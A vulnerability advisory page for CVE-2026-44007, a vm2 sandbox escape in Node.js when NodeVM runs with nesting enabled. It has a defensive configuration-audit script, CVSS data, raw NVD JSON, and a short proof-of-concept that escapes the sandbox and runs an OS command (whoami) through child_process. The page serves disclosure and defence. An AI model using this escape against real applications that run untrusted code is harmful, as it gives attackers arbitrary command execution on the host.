Security Vulnerability Report
CVE-2026-44007 CVSS 9.1 CRITICAL


Published: 2026-05-13 18:16:18
Last Modified: 2026-05-14 15:18:26

Description

vm2 is an open source vm/sandbox for Node.js. Prior to 3.11.1, when a NodeVM is created with nesting: true, sandbox code can unconditionally require('vm2') regardless of the outer VM's require configuration, including require: false. With access to vm2, the sandbox constructs a new inner NodeVM with its own unrestricted require settings and executes arbitrary OS commands on the host. Any application that runs untrusted code inside a NodeVM with nesting: true is fully compromised. This vulnerability is fixed in 3.11.1.
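As an added example (not code from the advisory or from the vm2 project), the following JavaScript audits a NodeVM options object for the precondition the description names, nesting: true on a vm2 release older than 3.11.1, and shows a hardened configuration next to the vulnerable one. It deliberately does not load vm2, so it runs on any Node installation; the version-comparison helper, the sample option objects and the wording of the findings are assumptions of this example.

```javascript
// Added example, not from the advisory or the vm2 project: a configuration
// audit that flags the NodeVM option combination CVE-2026-44007 concerns and
// checks an installed vm2 version against the fixed release named in the
// advisory. It does not load vm2, so it runs anywhere Node is available.

const FIXED_VERSION = '3.11.1'; // first fixed release, per the advisory

// Numeric comparison of dotted version strings. Assumption: vm2 releases are
// plain MAJOR.MINOR.PATCH with no prerelease suffix.
function compareVersions(a, b) {
  const pa = a.split('.').map(Number);
  const pb = b.split('.').map(Number);
  const len = Math.max(pa.length, pb.length);
  for (let i = 0; i < len; i++) {
    const x = pa[i] || 0;
    const y = pb[i] || 0;
    if (x !== y) return x < y ? -1 : 1;
  }
  return 0;
}

// True when the installed vm2 is older than the fixed release.
function isAffectedVersion(installed) {
  return compareVersions(installed, FIXED_VERSION) < 0;
}

// Audit the options object passed to `new NodeVM(...)`. Returns a list of
// finding strings; an empty list means this CVE's precondition is absent.
// Only `nesting` matters here: the advisory states the bypass works
// regardless of the `require` setting, so a restrictive or disabled
// `require` is reported as a non-mitigation rather than as protection.
function auditNodeVmOptions(opts, installedVersion) {
  const findings = [];
  if (opts.nesting !== true) return findings; // nesting off: not exposed via this CVE
  if (isAffectedVersion(installedVersion)) {
    findings.push(
      `nesting: true with vm2 ${installedVersion} (< ${FIXED_VERSION}): ` +
      `sandbox code can require('vm2') and build an unrestricted inner VM`
    );
    const requireRestricted =
      opts.require === false || (opts.require && opts.require.external === false);
    if (requireRestricted) {
      findings.push(
        `restrictive require settings do not mitigate this; upgrade to ${FIXED_VERSION} or set nesting: false`
      );
    }
  }
  return findings;
}

// Constructed sample configurations (not real application config): the
// vulnerable one mirrors the option shape in the PoC on this page; the
// hardened one only turns nesting off.
const vulnerableOptions = {
  console: 'inherit',
  sandbox: {},
  require: { external: false, builtin: [], root: './' },
  nesting: true,
};
const hardenedOptions = { ...vulnerableOptions, nesting: false };

console.log('vulnerable, vm2 3.11.0:', auditNodeVmOptions(vulnerableOptions, '3.11.0'));
console.log('hardened,   vm2 3.11.0:', auditNodeVmOptions(hardenedOptions, '3.11.0'));
console.log('vulnerable, vm2 3.11.1:', auditNodeVmOptions(vulnerableOptions, '3.11.1'));
```

The audit only looks at the constructor options and the installed version; whether the code fed to vm.run() is untrusted is a property of the application, not of the options object, so a clean result here still assumes the reviewer has answered that question separately.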

CVSS Details

CVSS Score: 9.1
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:vm2_project:vm2:*:*:*:*:*:node.js:*:* - VULNERABLE
vm2 < 3.11.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
const { NodeVM } = require('vm2');

// Create a vulnerable VM instance with nesting enabled
const vm = new NodeVM({
  console: 'inherit',
  sandbox: {},
  require: {
    external: false, // Restrict external modules
    builtin: [],     // Restrict builtin modules
    root: "./"
  },
  nesting: true // Vulnerable configuration
});

console.log('[*] Running untrusted code in vulnerable VM...');

// Malicious code to be executed inside the sandbox
const untrustedCode = `
  // Step 1: Bypass the outer require restrictions
  const vm2 = require('vm2');
  console.log('[+] Successfully required vm2 inside sandbox');

  // Step 2: Create a new inner VM with unrestricted privileges
  const innerVM = new vm2.NodeVM({
    require: {
      external: true,
      builtin: ['*']
    }
  });

  // Step 3: Execute arbitrary OS command using the inner VM
  const exploit = innerVM.run('(function() { return require("child_process").execSync("whoami").toString(); })');
  exploit();
`;

try {
  vm.run(untrustedCode);
} catch (e) {
  console.error(e);
}

References

https://github.com/patriksimek/vm2/security/advisories/GHSA-8hg8-63c5-gwmx (Exploit, Vendor Advisory)
http://www.openwall.com/lists/oss-security/2026/05/05/11 (Mailing List, Third Party Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-44007",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-13T18:16:17.527",
    "lastModified": "2026-05-14T15:18:26.150",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "vm2 is an open source vm/sandbox for Node.js. Prior to 3.11.1, when a NodeVM is created with nesting: true, sandbox code can unconditionally require('vm2') regardless of the outer VM's require configuration — including require: false. With access to vm2, the sandbox constructs a new inner NodeVM with its own unrestricted require settings and executes arbitrary OS commands on the host. Any application that runs untrusted code inside a NodeVM with nesting: true is fully compromised. This vulnerability is fixed in 3.11.1."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H",
            "baseScore": 9.1,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "HIGH",
            "userInteraction": "NONE",
            "scope": "CHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.3,
          "impactScore": 6.0
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          { "lang": "en", "value": "CWE-284" }
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:vm2_project:vm2:*:*:*:*:*:node.js:*:*",
                "versionEndExcluding": "3.11.1",
                "matchCriteriaId": "7836EA26-7490-43B0-ACA0-31B580080D72"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/patriksimek/vm2/security/advisories/GHSA-8hg8-63c5-gwmx",
        "source": "[email protected]",
        "tags": ["Exploit", "Vendor Advisory"]
      },
      {
        "url": "http://www.openwall.com/lists/oss-security/2026/05/05/11",
        "source": "af854a3a-2127-422b-91ae-364da2661108",
        "tags": ["Mailing List", "Third Party Advisory"]
      }
    ]
  }
}